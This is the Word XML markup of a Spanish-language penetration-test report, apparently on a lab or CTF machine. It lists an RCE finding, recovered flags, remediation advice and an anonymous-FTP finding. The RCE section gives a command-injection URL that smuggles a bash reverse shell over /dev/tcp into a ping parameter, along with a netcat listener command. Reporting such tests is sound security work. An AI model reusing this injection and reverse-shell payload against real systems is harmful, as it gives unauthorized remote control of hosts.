                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3778058" cy="2923888"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C3696F" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="284" w:right="461"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB0B2C5" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc200831436"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>3 RESULTADO DE LAS PRUEBAS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC71B89" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="50784D28" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc200831437"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>3.1 Detalles de los objetivos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3234D112" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F457BB4" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc200831438"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>192.168.1.141</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="17A76BE7" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CE349A6" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nombre:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ejecución remota de código (RCE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068D18C9" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Criticidad:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Muy Alta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFC8253" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B20A9E9" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Descripción</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Es una vulnerabilidad crítica que permite a un atacante ejecutar comandos o código malicioso en un sistema remoto, normalmente a través de una aplicación web vulnerable. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F22F794" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B80E1D9" w14:textId="2E86AD0A" w:rsidR="00437FF1" w:rsidRDefault="007F1491">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F1491">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FA9370A" wp14:editId="01996A37">
            <wp:extent cx="4191000" cy="2620425"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="7471913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134" name="Imagen 1" descr="Interfaz de usuario gráfica, Texto&#10;&#10;El contenido generado por IA puede ser incorrecto."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4193235" cy="2621822"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A65300E" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36F1440E" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Usando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 4444 y en la URL http://192.168.1.141/ping/index.php?ip=127.0.0.1;bash+-c+%27bash+-i+ %3E%26+/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/192.168.1.141/4444+0%3E%261%27 para poder conectarnos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CCA50D" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25E4C701" w14:textId="096C655A" w:rsidR="00437FF1" w:rsidRDefault="007F1491">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F1491">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E78E7EB" wp14:editId="17CCA238">
            <wp:extent cx="3933825" cy="2717916"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="196213678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36788" name="Imagen 1" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3940095" cy="2722248"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B33EB0" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64FCE8F6" w14:textId="207808C0" w:rsidR="00437FF1" w:rsidRDefault="00437FF1" w:rsidP="007F1491">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="558201E7" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="778FE144" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verificamos uno a uno intentando encontrar algo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Intentamos persistencia y logramos algo, en el directorio Deloitte encontramos una </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y un nombre james. FLAG{W311_D0N3_R00T_1S_W41T1nG_U} En el directorio </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> encontramos otra </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>información ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> usando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chatgpt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> nos indica que es </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>una cade codificado</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en base64 RkxBRyB7WTB1X2FyZSBhIHJlYWwgSGFja2VyfQo= </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C1F28D" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C82E702" w14:textId="2C8FB7A2" w:rsidR="00437FF1" w:rsidRDefault="007F1491">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F1491">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="208481B1" wp14:editId="6F81A6F5">
            <wp:extent cx="4105275" cy="2863760"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="182354636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46367" name="Imagen 1" descr="Interfaz de usuario gráfica, Texto, Aplicación&#10;&#10;El contenido generado por IA puede ser incorrecto."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4110904" cy="2867687"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E52520" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05CDF799" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:t>USANDO IA nos la descifra FLAG: F L A G {Y0u_ar_e_a_real_Hacker}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A05A2F" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27B0A05B" w14:textId="01F74E9E" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Recomendación:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1-Mantener el software y las bibliotecas actualizadas, usar un cortafuegos para las aplicaciones web. 2- Validación y saneamiento estricto de entradas 3-Evitar el uso de comandos del sistema operativo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E049063" w14:textId="737E141C" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:pict w14:anchorId="38187910">
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5023EAD3" w14:textId="30C6238B" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CF477B9" w14:textId="46B1E213" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nombre:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Autorización insuficiente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A1AA3C" w14:textId="7852A90C" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Criticidad:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Muy Alta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0C71D9" w14:textId="7726FB0B" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A78788E" w14:textId="181CD6C1" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Descripción</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Permitir accesos anónimos al servicio FTP significa que cualquier persona puede conectarse sin necesidad de autenticación y potencialmente: 1- Listar directorios. 2- Descargar archivos sensibles. 3- Subir archivos maliciosos si se permiten permisos de escritura. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB5E0E9" w14:textId="00932BE0" w:rsidR="00437FF1" w:rsidRDefault="007F1491">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F1491">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E28A3B2" wp14:editId="09FDE140">
            <wp:extent cx="5400040" cy="747395"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="569292369"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92369" name="Imagen 1" descr="Imagen que contiene Texto&#10;&#10;El contenido generado por IA puede ser incorrecto."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="747395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E823844" w14:textId="4B22D6DD" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54B558A7" w14:textId="0FF544A5" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C16D13D" w14:textId="34DC61D0" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vista del informe generado por </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2265F172" w14:textId="4A368F62" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BEC658D" w14:textId="6143512D" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7700A278" w14:textId="3B7FE284" w:rsidR="00437FF1" w:rsidRDefault="007F1491">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F1491">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3421B5CD" wp14:editId="38A38F70">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>624840</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>55245</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3400425" cy="1721307"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21281"/>
                <wp:lineTo x="21418" y="21281"/>
                <wp:lineTo x="21418" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="1765899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9200" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3400425" cy="1721307"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="766E3A93" w14:textId="47201542" w:rsidR="007F1491" w:rsidRDefault="007F1491" w:rsidP="007F1491">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4845"/>
        </w:tabs>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0C2619" w14:textId="77777777" w:rsidR="007F1491" w:rsidRDefault="007F1491">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B56C94E" w14:textId="77777777" w:rsidR="007F1491" w:rsidRDefault="007F1491">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5744CB8E" w14:textId="77777777" w:rsidR="007F1491" w:rsidRDefault="007F1491">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
    </w:p>
